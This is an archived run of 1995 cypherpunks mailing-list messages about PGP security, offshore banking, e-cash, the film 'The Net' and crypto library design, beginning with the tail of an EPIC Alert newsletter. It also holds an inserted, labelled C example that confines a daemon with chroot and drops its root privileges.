Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 301,
Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan.

Thank you for your support.

------------------------ END EPIC Alert 2.08 ------------------------



_________________________________________________________________________
Subject: EPIC Alert 2.08
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Freeman" <rfreeman@netaxs.com>
Date: Wed, 2 Aug 95 17:34:49 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
Message-ID: <199508030028.UAA11956@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Jul 95 at 20:49, Dr. Frederick B. Cohen wrote:

> 
> History shows that your approach fails. Here are some examples:
> 
>  Tens of thousands of people had source to the http daemon from
>  CERN, and yet none of them noticed a hole that was detected as
>  it was being exploited only a few months ago. 
> 
>  Tens of thousands of people have access to sendmail and yet
>  new holes are found by attackers several times per year on
>  average.
> 
>  Tens of thousands of people have access to the sources of
>  various versions of hundreds of software packages, yet there
>  are holes found every day.
> 

I don't think this is a very good analogy.  The problems that occur with these
programs don't really occur due to a fault in the programs themselves so much as
in their interactions with other programs.  Unix is a very complex OS in the
regard that it allows for a lot of program interaction.  Same thing with
something like windoze - you don't see nearly as many program crashes in DOS
as in windoze, because in DOS only one program operates at a time, and it is
in an environment of the developer's choosing, rather than the user's.  I
personally only use pgp on my DOS machine - primarily because it is secure (or
at least reasonably so).  These weird interactions are very hard to purposely
orchestrate and I doubt that they could be placed into a program which has
been ported into so many different OS's.  Try reading the source yourself.  It
is pretty well commented, and it doesn't fork or anything so there won't be
any kind of weird in-program interactions.  I personally subscribe to the fact
that so long as there aren't any errors in the OS or compiler or machine
itself, then the source alone is enough to fully determine the operation of a
single-tasking program.  I don't pretend to understand the mathematics behind 
IDEA and RSA and all that (mostly because I haven't had time to read up on 
them), but it shouldn't be hard to verify that the program does in fact 
correctly execute the algorithm.
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 2 Aug 95 20:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <H2H99c9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@sensemedia.net (Timothy C. May) writes:
> I saw "The Net" yesterday and was moderately entertained. Lots of leaps of

I saw it about 1/2 hour ago. I make a point of seeing every computer-related
movie. I don't think real movie-goers would enjoy it much. It's cheap and
unprofessional. Lots of running around, but no real car crashes. The acting is
terrible. The star should NOT have appeared in a bikini. Yech.

> logic, especially the notion that one can be "vanished" by having computer
> records changed--I can believe that such changes would screw things up, but
> surely even the character played by Sandra Bullock (nicely) would have
> human friends and associates to vouch for her.

They try to "explain this away" by saying that 1) she lived in the neighborhood
for 4 years and never got to know any neighbors (as one of the neighbors tells
the police), 2) her mother's got Alzheimers and doesn't recognize her anymore,
3) she telecommutes for a company in another city and only knows 2 people there
in real life. One gets killed at the beginning; the other gets fired and she
makes no attempt to find him (one of the many loose ends). The computer-related
plot is just slightly more plausible.

(Movies about financial services, like _Wall St_ usually distort reality much
worse than movies about computers. Can you say "creative licence"?)

> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen.

Yes, everything is done on various PowerMacs, including playing Wolfenstein.
Could be X terminals. Except for a little Duo she gave her shrink/boyfriend,
and a powerbook she used at the beach. IMO, it's better than most such
scenes... It's way better than the scene in Wargames where the computer tries
to pick 10 digits of a password one by one... Not as good as Sneakers...

In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
office and sets off a fire alarm. Everyone leaves, including a villaine, who
doesn't log off. The heroine receives a new e-mail addressed to the villaine,
with the orders to kill the heroine (cleartext), signed 'pretorian'. The heroine
types 'whois pretorian' and gets an IP address, but no name. The heroine goes
through what looks like traceroute and obtains the pretorian's name and picture
(but the viewers know his identity from the start, of course). She finishes
saving it to a floppy disk moments before the villaine returns to the cubicle.

(One of the IP bytes was 344, by the way.)

Another time she types "telnet someone@somewhere.mil". Another time she
"hot chats" on her Mac, and hooks up the text to a voice synthesizer.

(If they all exchange so much e-mail, why do they bother FedExing diskettes?)

> If this was the film I advised a woman screenwriter/researcher about (the
> "vanishing" part she was asking me for tips on, 18 months ago), I sure

They may have been reading the Risks digest too much. :) One guy is apparently
flying his Cessna "by wire", thinks he's approaching the airport, actually hits
a smokestack. Another guy gets wrong medications, twice, and dies. All as
the result of the villaines changing computer records, of course.

Interestingly, there's NO mention of crypto. Once you know someone's password,
or have physical access to the media, you can read and write everything. Once
you change some data, it's changed. No digital signatures. However, once the
virus melts the villaines' mainframe, their data is gone. No backups. And all
the changes they made in other systems are reversed. Reminded me of _The Wizard
of Oz_ a bit.

In fact, the bad guys were selling everyone a computer security system called
"the Gatekeeper" (a Trojan horse, really), but it's not identified as crypto.
It sounded like access rights are checked by their server. It involves a Web
page with a 'pi' symbol (pi stands for pretorian, of course). Clicking on the
pi while pressing control-shift will display much hexadecimal stuff and then
let the user in through a backdoor. Hmm. Gatekeeper = Bill Gates = Windows 95?
Is that why Apple lent those Macs? :)

There's a character named "CyberBob" who's never seen. He only hot-chats
and eventually gets killed. His icon looks like MS Bob.

I heard only one mention of "the Internet". At the end of the movie, a TV
announcer says that the case was cracked because the "programmer analyst
Angela Bennett e-mailed the evidence to the FBI from the Internet".
(E-mailed from an open-access computer at a computer show, I might add)

We were treated to 5 or 6 previews. One was for another movie called
"The Hackers", on the same topic, coming this summer. Some kids like to
break into systems. The bad guy blackmails someone, frames the kids.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 2 Aug 95 21:04:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: your mail
Message-ID: <8AE653E.00030002B9.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


AB> I suppose if I were really paranoid I'd feed in fixed starting points
AB> for the search to MIT PGP and PGP 2.6.2 to make sure that they come out
AB> with the same keys.

  Or use the non-MIT version to generate your keys, but let the MIT
version do your encryption. Nobody can tell where your key came from,
can they?


 * Come to Rosty's Bargain Basement, for a STEAL of a deal!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 2 Aug 95 21:04:34 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <8AE653E.00030002B8.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


MB> > an account that can be accessed over the net will be the day I close my US
MB> > accounts.
MB>
MB> Interesting idea ...
MB>
MB> 1st question or thing I would want to be certain of is the stability of the
MB> currency of the realm so to speak. I wouldn't want to bank in a country that
MB> had a weak currencey (sp) or was subject to roller coaster economics.

  Why would the currency of the country be relevant to the bank? There
is no reason why banks can not calculate balances in foreign currency. A
bank could even permit "vector balances" for accounts, such as:

                               <D, F, M, Y>

representing Dollars, (Swiss) Francs, Deutschmarks, and Yen,
respectively. One could even create a "synthetic currency" set to, say,
<.25, .4, .5, 30>, and all deposits and withdrawals would be converted
accordingly. This way, if one country blows things, you don't get hit
too hard.

  ObCrypto: Well... This will involve a bit more complicated arrangement
of finances, and add in the currency-conversion thing, so it will be
even more important to have standardized means of secure communications
with your offshore bank.


 * A Liberal puts your money where his mouth is.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 22:35:51 PDT
To: Nathan Zook <pjm@ionia.engr.sgi.com>
Subject: Re: NYET--attempted formal specs (again)
Message-ID: <ac45ab641b021004c902@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 8/2/95, Nathan Zook wrote:

...lots of other threads elided...

>Unquestionably, it is not possible to block this hole entirely.  However,
>that does not mean that this proposal is not still superior, at least on
>two points.
>
>First, by moving the monitoring software to the ISP, the installation &
>configuration becomes much easier and more secure for the parent.  The
>monitoring software itself becomes at least as difficult to hack as the
>rest of unix, and the "Hot Babes Watch" hacks at least are prevented.

Knowing that Nathan is a member of the Religious Right (tm), I think
enlisting their support for receiver-level filtering is a GOOD IDEA.

I happen to be a Nonbeliever--Allah forfend!--but I have no problems with
their beliefs.

In fact, most religious groups are distrustful of "The Gubment" deciding
what's reasonable and what's not.

The thing to do is to get the Mormons, the Baptists, the Muslims, the
Rosicrucians, the Davidians (those who survived the BATF action), and the
Breatharians, etc., to all agree that they need to "screen the evil out" on
_their_ side, not to get "The Gubment" to do it for them.

Orrin Hatch, a Mormon, has said that he grew up in Pennsylvania, and he
chafed under having to say the school prayers of the Dominant Religious
Paradigm. He has said that this makes him skeptical and critical of any
efforts to institute religion in classrooms.

I don't see any religion in America as being sufficiently dominant that it
thinks it can get its particular agenda accepted as the Dominant Religious
Paradigm. That is, they all seem suspicious of government involvement.

All to the good.

Thus, while not a Christian or even any kind of theist, I find much, much
less to fear from religious groups in the U.S. than I do from various
non-religious groups.

(Of course, if the Third Episcopal Transcendentalists succeed in taking
power, and begin "purifications" through crucifixion of non-Episcopals, I
may modify my charitable opinions...)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 2 Aug 95 22:53:58 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <9508030441.AA02714@gimli.cs.hope.edu>
Message-ID: <199508030553.WAA18286@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> hallyn@cs.hope.edu (Kenshiro) writes:
> [after all, what could beat the scene in Jurassic Park : "This is Unix. I 
> know this..." followed by what looks like a 3-d landing into zany-land.
> In slow motion. ]

Bad example -- it's a real interface to Unix for SGI machines, and you can
pick it up from their ftp site.  It made perfect sense for the girl (Lex?)
to be familiar with it...  I'm sure her doting grandfather (or whatever he
was) wouldn't have bought her a measly Sparcstation for her home computer.

	Jim Gillogly
	Highday, 11 Wedmath S.R. 1995, 05:53




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 2 Aug 95 09:30:29 PDT
To: cypherpunks@toad.com
Subject: Are there free implementations of DSS available?
Message-ID: <Pine.LNX.3.91.950802233833.1562B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for any pointer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallyn@cs.hope.edu (Kenshiro)
Date: Wed, 2 Aug 95 21:41:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <9508030441.AA02714@gimli.cs.hope.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote :
> I saw "The Net" yesterday and was moderately entertained. Lots of leaps of
...
> 
> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen. (But maybe I'm
> biased...)
As long as you realize it.
:)

[after all, what could beat the scene in Jurassic Park : "This is Unix. I 
 know this..." followed by what looks like a 3-d landing into zany-land.
 In slow motion. ]

-- Serue the SUNite

(hmm. so it's entertaining, mindless and devoid of reality? I'm there!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Wed, 2 Aug 95 11:25:12 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <v02120d02ac44470c47f1@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8.2.95, Timothy C. May wrote:

>There is the "digital cash society" we fear as an Orwellian surveillance
>society, with all transactions recorded. This is perhaps the future
>Robertson fears.
>
>There is the "digital cash society" based on Chaumian schemes and
>untraceability, similar to a "hard cash" society without proofs of identity
>at every stage, and I suspect Robertson would find much to like about this.
>
>(There are also the implications which Robertson might recoil at, too. :-})
>
>So, hearing that "Pat Robertson is warning against a digital cash society"
>is not too worrisome to me. I suspect he means the stuff about Big Brother
>tracking us and the Number of the Beast, and so on.
>
>Don't forget he came out strongly against Clipper, early on.


And at 1:44 PM 8.2.95, Peter Trei wrote:

>The relevant verses are in Revelations 13, where some of the actions
>by which The Beast can be recognized are given. Among them are:
>
>16 And he causeth all, both small and great, rich and poor, free and
>   bond, to receive a mark in their right hand, or in their foreheads:
>17 And that no man might buy or sell, save he that had the mark, or
>   the name of the beast, or the number of his name.
>
>Millennialist Christians tend to regard this as a method by which
>the faithful will be shut out of the economy, since the pious will
>refuse such a 'mark'.
>
>E-cash is a bit of a reach from this, but some of them (eg,
>Robertson), extend the verses to cover all forms of trackable
>transactions. I suspect that if someone could get him to realize the
>privacy aspects of true anonymous ecash, he'd like it.


        This antinumerical tradition is, relevant biblical passages aside
(see also Daniel, Ezekiel, as well as assorted HB and NT Apocrypha) a
Protestant Anglo tradition that stretches back almost a thousand years to
the census that came to be known as the Domesday Book. Pop opposition to
censuses and the like is, AFAIK (and I know pretty far on this subject),
all but unheard of among e.g. predominantly Catholic cultures (how many
govts has the Italian peninsula seen?).
        Robertson isn't approaching this question _primarily_ from a policy
or humanist-liberal standpoint--he's approaching from a religious
standpoint: his duty as a preacher is to warn fellow Christians against
falling prey to Satan's machinations. And since the assignation of numbers
to people is, he feels, such a machination and a sign of the endtimes,
"fear" perhaps isn't the best word to describe his take on the future
(which in his view is a very bounded entity): while filled with
tribulations in which many of the devout will fail, the events of this era
prefigure Jesus's imminent return. This isn't to say that, in the absence
of Jesus's return (an absence of which I'm quite confident), Robertson's
recommendations don't have a policy potential or political
ramifications--on the contrary, they very likely will. Given the fact that
there's a longish prehistory to Christian interpretations of SS #s, UPC
symbols, etc. as the Mark of the Beast, it seems more likely that
fundamentalists will tend to view _stable_ numbers assigned by impersonal
institutions as the MotB, rather than, say, interpreting public keys--which
people themselves can generate and revoke at will--as the mark.
        It's fine with me if Robertson mobilizes Christian soldiers against
the governmental fracturing of privacy (note the irony in his acceptance of
"privacy" as a legit philosophical-legal doctrine in this context,
BTW)--it's just a shame that he has to mix these issues up with idiotic
references to Chaum's religion of birth, as though that was significant on
a par with Chaum's work. Needless to say, though, I'm a secular humanist.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 3 Aug 95 02:06:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
Message-ID: <9508030905.AA15886@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook writes:
> The NYET-software runs as superuser on the ISP's machine.  All minor
> accounts have a corresponding configuration file sitting in their
> account owner's parent's directory, which is locked with read/write by
> owner only flags.  The correspondence between minor and parent
> accounts sits in a file owned by root and similarly locked.

Just a minor technical comment:
Based on my rather limited experience lurking on the firewalls list, I
believe the preferred security-conscious method of running such daemons
involves _not_ giving them su/root privileges.  Dr. FBC's thttp, for example,
runs as a user named, e.g., "www" with pretty ordinary privileges. They are
also often run in a chroot()ed "jail", so that the process can't see any
directories outside the tree artificially rooted in its home directory. You'd
then need some mechanism for the `rents to submit configuration updates to
the imprisoned daemon, I suppose.  Perhaps digitally-signed email....

-Futplex <futplex@pseudonym.com>
"Before you started tokin' you used to have a brain, but now you don't get
even the simplest of things...." -Offspring
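
[Added example, not part of the original post and not code from any daemon it names: one way a daemon started as root can confine itself to a chroot() jail and then switch to an ordinary account, as the message above describes. The jail path and the numeric uid/gid passed on the command line are hypothetical.]

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* glibc: declare chroot(), setgroups(), seteuid() */
#endif
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* One code per step, so the caller can log exactly where the drop failed. */
enum drop_result {
    DROP_OK       =  0,
    DROP_EBADID   = -1,  /* asked to "drop" to uid 0 or gid 0 */
    DROP_EBADJAIL = -2,  /* jail path missing or not absolute */
    DROP_ENOTROOT = -3,  /* not started as root: cannot chroot */
    DROP_ECHROOT  = -4,
    DROP_ECHDIR   = -5,
    DROP_EGROUPS  = -6,
    DROP_ESETGID  = -7,
    DROP_ESETUID  = -8,
    DROP_EREGAIN  = -9   /* root could still be regained afterwards */
};

/*
 * Confine the process to `jail`, then become uid/gid for good.
 * Call this after opening anything that needs root (privileged port,
 * log file) and before reading any untrusted input.
 * The order matters: chroot() needs root, and supplementary groups and
 * the gid must be changed while the process is still uid 0.
 */
int drop_privileges(const char *jail, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return DROP_EBADID;
    if (jail == NULL || jail[0] != '/')
        return DROP_EBADJAIL;
    if (geteuid() != 0)
        return DROP_ENOTROOT;

    if (chroot(jail) != 0)
        return DROP_ECHROOT;
    /* Without this the working directory stays outside the jail. */
    if (chdir("/") != 0)
        return DROP_ECHDIR;
    /* Discard root's supplementary groups; keep only the target gid. */
    if (setgroups(1, &gid) != 0)
        return DROP_EGROUPS;
    if (setgid(gid) != 0)
        return DROP_ESETGID;
    /* As root, setuid() sets real, effective and saved uid together. */
    if (setuid(uid) != 0)
        return DROP_ESETUID;

    /* Verify instead of assuming: getting root back must now fail. */
    if (setuid(0) == 0 || seteuid(0) == 0 || getuid() == 0 || geteuid() == 0)
        return DROP_EREGAIN;
    return DROP_OK;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s /absolute/jail uid gid\n", argv[0]);
        return 2;
    }
    uid_t uid = (uid_t)strtoul(argv[2], NULL, 10);
    gid_t gid = (gid_t)strtoul(argv[3], NULL, 10);

    int rc = drop_privileges(argv[1], uid, gid);
    if (rc != DROP_OK) {
        /* Fail closed: never continue serving with root privileges. */
        fprintf(stderr, "privilege drop failed (code %d), exiting\n", rc);
        return 1;
    }
    printf("running as uid %lu inside the jail\n", (unsigned long)getuid());
    /* ... the daemon's main loop would start here ... */
    return 0;
}
```
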



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 3 Aug 95 04:26:18 PDT
To: cypherpunks@toad.com
Subject: Using private keys on "insecure" multi-user systems for fun and profit!
Message-ID: <199508031126.FAA09549@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

[The following is being posted to alt.security.pgp, sci.crypt, and
cypherpunks and e-mailed to my friend Sebastian.  -Bryce]


Ed Pugh writes that he doesn't sign all his e-mail because he doesn't have a
decent off-line news/mail setup.  I strongly suggest to Ed, and all others
who have this complaint (of whom there seem to be many), that they go ahead
and generate a "reduced security" key pair for use on-line.  That is, the
private key will be accessed while you are on-line so that it is easy for you
to use it for routine signing and encryption/decryption.


There are at least 3 good reasons to do this:


1.  Even though a hacker or sysadmin on your system can then read your mail
or fake mail from you, at least a hacker or sysadmin on *my* system can't
read my mail to you or fake mail from you to me.

2.  "Think of it as a form of solidarity."  If everyone used these "reduced
security" keys, and the hypothetical Big Brother police organizations want 
to routinely scan e-mail for keywords or something, they would have to 
secretly get access to every ISP and freenet in the country!  By 
transmitting your e-mail in the clear you are making their job a lot 
easier.

3.  The more people have "-----BEGIN PGP SIGNED MESSAGE-----" in their 
UseNet posts and e-mail, the more people will say "Hey what is this PGP 
stuff?" or "Hey, everyone seems to be using PGP, maybe I should get in 
on it."


  By using a "reduced-security" private key you are gaining some of the 
advantages of public-key cryptography for yourself as well as contributing 
to its widespread acceptance in net.society.


  (You might think that most people on the Internet know about PGP, but this
is not true.  Only a fraction have even heard of it, and only a *small*
fraction have any understanding of it.  A small fraction of *that* population
uses it regularly, which is what I am trying to change.)


Ed wrote that he downloads text to his home computer and signs it with his
high-security private key there when he feels that it is important enough.
He should continue to do this!  I have one key which I keep on my home
computer (and which my more paranoid friends like to use) and one which I
keep on colorado.edu computers.  (Both keys have signed each other, by the
way.)  


I know that Zimmermann specifically warns against what I am suggesting in
pgpdoc1.txt, and I think that it is a mistake for him to do so.




In short, there is no reason why every PGP-aware individual should not
at least clearsign if not encrypt every message which he or she transmits.  
There are several advantages to doing this and no disadvantages.


The greatest threat to security is that people don't use it!  Help change 
that by encrypting/signing *all* of your output.


Bryce


 In alt.security.pgp, Ed Pugh <ai928@FreeNet.Carleton.CA> wrote:
>
>Not to mention the fact that it is a major PITA for those of us who
>do not have a decent off-line news/mail program.  My main connection
>to the net from home is the National Capital FreeNet here in Ottawa.
>It is the main reason why I do not sign my posts.  I do (and have done)
>if I feel that a posting is somehow "important" enough to warrant a
>signature, but those tend to be *very* rare.
>
>From home, I use a dial-up access with a PC terminal emulator program
>(I use TELIX).
>
>The three or four postings in this thread which were encrypted had to
>be down-loaded (using screen capture), then decrypted in DOS.  It would
>be nice to have a decent off-line reader/editor but .... <sigh>.
>
>Please let's keep postings in the clear.  If I feel a need to verify a
>signature, I will (using the method above).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta Unix script

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 3 Aug 95 03:49:03 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: US vs Overseas Banks
In-Reply-To: <v02120d1eac45b00dab31@[199.2.22.120]>
Message-ID: <Pine.SUN.3.91.950803063712.14200A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 2 Aug 1995, Douglas Barnes wrote:

> Mostly they are afraid that you will get checks under a fake name, and
> bounce a lot of them, which ends up costing them a lot of money, even
> though they don't pay off on them. (Most of the  costs of any financial
> transaction system come from handling exceptions).

They really worry that you will divert real checks payable to the account 
name you are using, deposit them, collect the dough, and disappear.  They 
will then be on the hook because they paid on a false endorsement and the 
institution that deals with the false endorser gets stuck.

>They are also
> under obligation to provide accurate SSN or Business Tax-ID information
> to the government on any interest-bearing account, so that you are
> forced to declare it on your income taxes.

They are also under an obligation to obtain identity information from 
everyone who opens accounts (even non-interest-bearing).  Many Midwest 
banks still don't.  The rules don't specify exact ID requirements so 
there is some slop here.  They say you have to use the same ID 
requirements to open an account that you (the bank) would use to cash a 
check.
 
If you shop around, you can find friendly banks even today.

DCF

"'The Internet made me do it' -- Janet on how a call to arms on the nets 
caused her to send in the tanks."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gerstein@scsu.ctstateu.edu (Adam J. Gerstein)
Date: Thu, 3 Aug 95 08:13:14 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Using MacPGP to revoke a key...
Message-ID: <v02130500ac45a2c0b770@[17.127.10.47]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to bother y'all with such an amateur question, but I can't find this
in TFM, so I figured I'd ask those who are more in the know.....

Anyway, I'm considering revoking my public key because it's been out there
a while and I'm feeling the urge to change to a larger key, but I'm not
clear on how to revoke the old one. Do I just make a text file with my new
key in it, explain that I'm revoking the old one, sign it with my new key
and then post it to the list? Or do I just send it to a keyserver?

Again, I'm sorry to be asking y'all about something so easy. I don't want
to start a whole new thread about this, so if you've got something helpful
to add, please send it via private mail.

Thanks,
adam

"Practice safe HEX - always use a keyboard condom" - anon
PGP Key available by finger or mail with the sub: PGPKEY
+-------------------------------------------------------+
|(e)Mail me:                    |  MacGeek@eWorld.com   |
|  Gerstein@scsu.ctstateu.edu   |  AGerstein@aol.com    |
+-------------------------------+-----------------------+
                    EWWWWW! - Betsy
             Shop smart! Shop S-Mart! - Ash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 3 Aug 95 05:43:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9507210900.AA25179@snark.imsi.com>
Message-ID: <9508031243.AA18140@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> I believe that between IPSP for the
> links and MOSS (and SHTTP using MOSS for document security) we should
> have the whole thing wrapped up in a couple of years. Problems still
> to solve include security for the internet's routing protocols,
> protection against denial of service attacks, etc.

Could someone say a bit more about the perceived difficulties associated
with secure network routing protocols ?  TIA.

I am not at all optimistic about defeating DoS attacks....

[...]
> Those people who would rather work than talk are invited to start
> reading the internet drafts (some of which are soon to be RFCs) and
> help out with the effort. I suspect that a big push from about 25
> people could manage to implement just about everything we want and then
> we could go on and live the rest of our lives.
> 
> There is a lot of real hard work to do in the next year or two and I
> invite members of the community to quit waiting for the CryptoRapture
> in which the X-Ists bring down the cypher systems of the future, and
> help us actually do the job so that we'll see this stuff in our
> lifetime.

(just felt this was worth quoting)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 3 Aug 95 03:35:22 PDT
To: cypherpunks@toad.com
Subject: Re: US vs Overseas Banks
Message-ID: <2982@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.3.89.9508012150.E12592-0100000@khijol> "Ed Carp [khijol SysAdmin]" writes:
> Why should they give a damn who you are?  IMO, it's none of their 
> business.  Hell, they're making $$$ on *your* deposits, it's time they 
> stopped being such shits about it.
It's probably bad for business if your bank gets a reputation as 
"check-bouncers-R-Us".   Knowing your customers may make it less 
likely they bounce checks; it certainly makes collecting (if you 
honor the check) much easier.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 3 Aug 95 09:26:31 PDT
To: s5cromw@watson.ibm.com
Subject: Re:  Object Oriented Crypto API
Message-ID: <199508031625.JAA11761@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I enjoyed Ray's message about the crypto library interface.  I haven't
had time to study it closely, but I have a couple of quick comments:

I thought Wei's library looked pretty easy to use already.  Maybe Ray
could show an example of what would be needed with Wei's library to do
some "typical" crypto function, say encrypting a message with someone
else's RSA key.  Then we could compare it with how the same function
would look with Ray's proposed interface.

The other point is that there needs to be the ability to encrypt only
a bit of a message at a time.  Particularly with public key the first
message may be special in that it generates a session key which is used
for the remainder.  So an interface for piecewise encryption and
decryption is necessary.

I hope we will see more discussion about the library.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 08:17:06 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
